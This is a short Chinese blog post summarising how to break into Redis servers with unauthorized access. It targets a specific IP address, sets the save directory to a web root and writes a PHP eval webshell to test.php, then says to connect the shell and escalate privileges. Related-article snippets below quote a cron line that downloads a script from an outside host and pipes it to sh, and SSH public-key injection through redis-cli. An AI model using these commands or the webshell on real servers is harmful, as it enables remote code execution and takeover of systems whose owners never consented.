Redis入侵小结

最新推荐文章于 2023-01-11 20:30:00 发布
最新推荐文章于 2023-01-11 20:30:00 发布
阅读量315 收藏
点赞数
分类专栏: 备忘

如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:

 

开启redis客户端

 

输入以下命令来连接远程redis

 

redis-cli -h 125.39.185.150 -p 6379

 

接下来,在远程redis内存中设置数据:

 

config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)

 

config set dbfilename test.php(在内存中的/var/www/html目录下建立一个test.php文件)

 

set xiaoma "<?php @eval($_POST[mi]);?>"(设置key-value,此时该值在Memory中)

 

save (将Memory中的key-value保存到硬盘,并保存为test.php文件)

 

四个OK就搞定了~

 

 

此时,就可以直接连shell,开始提权了~

 

redis入侵参考:

 

http://www.wooyun.org/bugs/wooyun-2015-0101465

 

http://www.wooyun.org/bugs/wooyun-2010-0105096

EncodingH
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redis常用命令小结
01-21
1、redis-benchmark redis基准信息,redis服务器性能检测 redis-benchmark -h localhost -p 6379 -c 100 -n 100000 100个并发连接,100000个请求,检测host为localhost 端口为6379的redis服务器性能 [root@...
Redis安装与使用方法小结
12-16
Redis是一款高性能的键值存储系统,常用于缓存和数据持久化。本文将详细介绍Redis的安装与使用方法,包括从下载、安装、启动、测试、持久化策略、开机启动、安全配置、命令行模糊查询以及设置键的过期时间等方面。 ...
redis被黑客入侵
程序员陆通
02-12 1476
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
redis 入侵
Henry_Wu001的专栏
07-22 222
redis 入侵
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 879
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
通过Redis入侵服务器
******* ▄︻┻┳═一 *******
08-15 6272
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆步骤: 一、生成本地ssh公钥ssh-keygen二、先连接redis看看telnet 192.168.88.136 6379 redis-cli -h 192.168.8
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 6921
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
redis4.0入门小结
12-16
Redis 4.0 入门小结Redis 是一个高度流行且被广泛使用的 NoSQL 数据库,尤其受到大型互联网公司的喜爱。无论你是一名开发者、测试工程师还是运维人员,掌握 Redis 的使用都能提升你的专业技能。本文将深入探讨...
利用redis漏洞入侵服务器
yaoxiaofeng_000的专栏
04-12 1261
目标机:172.16.20.173登录机:172.16.20.55假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") &gt; foo.txt# re...
记录一次redis漏洞攻击
陈浩然MC的博客
09-11 3268
服务器挖矿病毒的排查过程 事情起因:朋友的一台阿里云主机,登录特别卡,找我看看 这一看就感觉出问题了,机器特别卡,top看了一眼,cpu几乎是100%运行 但是奇怪的是用top命令完全看不出来哪个进程占用资源,当时的截图找不到了,这是第一次遇到这种情况,没有显示今晨占用资源,偏偏资源被跑满 排查 刚接手问题的时候我也是一脸闷逼,很奇怪,明明是没有进程占用的,为什么还会这样? ...
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1355
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
服务器 redis入侵
beyond__devil的博客
09-04 823
这几天服务器上的 redis,出现了一个比较严重的问题: 程序返回错误: MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled. Please ch...
redis入侵小结
weixin_33953249的博客
09-23 136
redis安装:   windows安装包:http://pan.baidu.com/s/1i3jLlC5   下载下来之后,开始安装:   redis-server.exe redis.conf:     简单一步,安装成功,保持这个windows持续运行~   查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis的密码~   ...
redis漏洞被攻击
dwdqsa的博客
03-05 585
redis在无密码 且无bind情况下 黑客可以拿到root凌晨四点 服务器被攻击 之后服务器内存一直被udevs占满,疑似挖矿进程,删除会自动恢复去掉执行权限 chmod -x 后 杀掉进程 服务器正常...
服务器由于redis未授权访问漏洞被攻击
weixin_30692143的博客
06-20 163
昨天阿里云拦截到了一次异常登陆,改了密码后就没有管他, 今天阿里云给我发消息说我的服务器可能被黑客利用,存在恶意发包行为。。。。。。。 不过我不打算只是单纯的重置系统,经过一系列的查找原因后,发现被攻击的原因是我的redis没有设置登陆密码(redis 默认情况下,没有配置登陆密码,任意用户可以登录),被黑客利用然后获取到了我的root权限。 先用#ps -ef 命令看看有没有什么可疑...
Redis攻击手法
网安君的博客
06-30 1245
REmote DIctionary Server(Redis) 是一个由 Salvatore Sanfilippo 写的 key-value 存储系统,是跨平台的非关系型数据库。Redis 是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库,并提供多种语言的 API。Redis 通常被称为数据结构服务器,因为值(value)可以是字符串(String)、哈希(Hash)、列表(list)、集合(sets)和有序集合(
Redis的初步搭建及被入侵经历
dobat的博客
05-31 3873
越来越觉得Redis的火热,同时日常开发中迫切需要用到,所以赶紧来充充电吧。网上非常详细的介绍了Redis的来源、特点、数据结构、应用场景等。在这里仅以一个新接触的入门者来自我总结下,Redis可以理解为以内存作为数据存储介质,因此读写效率极高,相比较于传统的关系数据库,如Mysql,非常适合存储读取频繁使用的数据。同时实现了持久化,不用担心数据丢失,支持多种数据结构,主从模式、配置集群什么的当然...
记录Redis的一次攻击事件
孤城长烟
03-12 2506
买了阿里云的一台服务器自己玩的,今天发现Redis攻击了,执行crontab的时候,发现莫名其妙的任务。一开始也搞不懂哪里被攻击了,上午查了一下,刚好看到一篇关于redis攻击的文章。结合自己的情况,发现果然是这样的。
Redis漏洞入侵防护方案
微小的鱼的博客
11-20 623
关于redis的漏洞防护
redis集群安装实验小结
最新发布
06-12
Redis 集群安装实验通常涉及...实验小结要点: - 理解Redis集群的工作原理,如槽的概念和哈希槽的分布。 - 掌握如何管理和维护Redis集群,包括节点增删、故障转移等操作。 - 学会监控和配置集群以保证高可用性和性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值